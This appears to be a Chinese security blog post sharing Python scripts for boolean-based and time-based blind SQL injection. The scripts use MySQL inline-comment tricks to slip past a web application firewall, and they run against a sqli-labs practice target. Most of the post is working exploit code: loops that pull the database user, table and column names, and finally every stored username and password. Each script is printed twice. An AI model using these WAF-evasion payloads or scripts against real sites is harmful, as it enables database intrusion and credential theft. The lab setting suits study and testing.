过狗盲注脚本-布尔/延时
0x01:前言
前面写过关于过狗的tamper,但是局限性也是显而易见的,只支持联合注入...本来是打算把其他注入方式的tamper写一下的,但是实际编写的时候,发现盲注对于sqlmap局限性有点大,与其编写tamper还不如自己写脚本。
0x02:基于布尔
依然是使用内联注释进行绕过,原理已经讲过许多次了,这里就不讲了,直接贴脚本,这里不得不说,wordpress代码处理这块真的垃圾,贴个代码费死劲....
#coding:utf-8
import requests
sql=""
for i in range(1,17):
for j in range(33,127):
#url = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ ascii(substr((select user/*!80000aaa*/()),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1'='1"
#url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ table_name /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema=database/*!80000aaa*/() limit 3,1),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
#url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security' ),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
r = requests.get(url=url)
if "are" in r.content:
sql+=chr(j)
print sql
break
import requests
sql=""
for i in range(1,17):
for j in range(33,127):
#url = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ ascii(substr((select user/*!80000aaa*/()),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1'='1"
#url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ table_name /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema=database/*!80000aaa*/() limit 3,1),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
#url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security' ),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1' = '1"
r = requests.get(url=url)
if "are" in r.content:
sql+=chr(j)
print sql
break
0x03:基于延时
#coding:utf-8
import requests
sql = ''
for x in range(1,300):
for y in range(33,127):
#url1 = "http://192.168.150.139/sqli/Less-9/?id=1' /*!11444and*/ if(((ascii(substr((select database/*!80000aaa*/()),%d,1)))=%d),sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
#url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(table_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
#url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*//*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/'1' = '1"
url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
url2 = url1%(x,y)
try:
f = requests.get(url=url2,timeout=1.5)
except:
sql+=chr(y)
print sql
break
import requests
sql = ''
for x in range(1,300):
for y in range(33,127):
#url1 = "http://192.168.150.139/sqli/Less-9/?id=1' /*!11444and*/ if(((ascii(substr((select database/*!80000aaa*/()),%d,1)))=%d),sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
#url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(table_name) /*!80000aaa*/from/*!80000aaa*/ information_schema.tables where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
#url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(column_name) /*!80000aaa*//*!80000aaa*/from/*!80000aaa*/ information_schema.columns where table_schema='security'),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/'1' = '1"
url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!80000aaa*/select/*!80000aaa*/ group_concat(username,password) /*!80000aaa*/from/*!80000aaa*/ users),%d,1))=%d,sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
url2 = url1%(x,y)
try:
f = requests.get(url=url2,timeout=1.5)
except:
sql+=chr(y)
print sql
break
0x04:结语
这里依然使用了遍历ASCII码的方式,没有使用二分法,所以速度慢的要命。最近也没时间优化,先放这里吧。
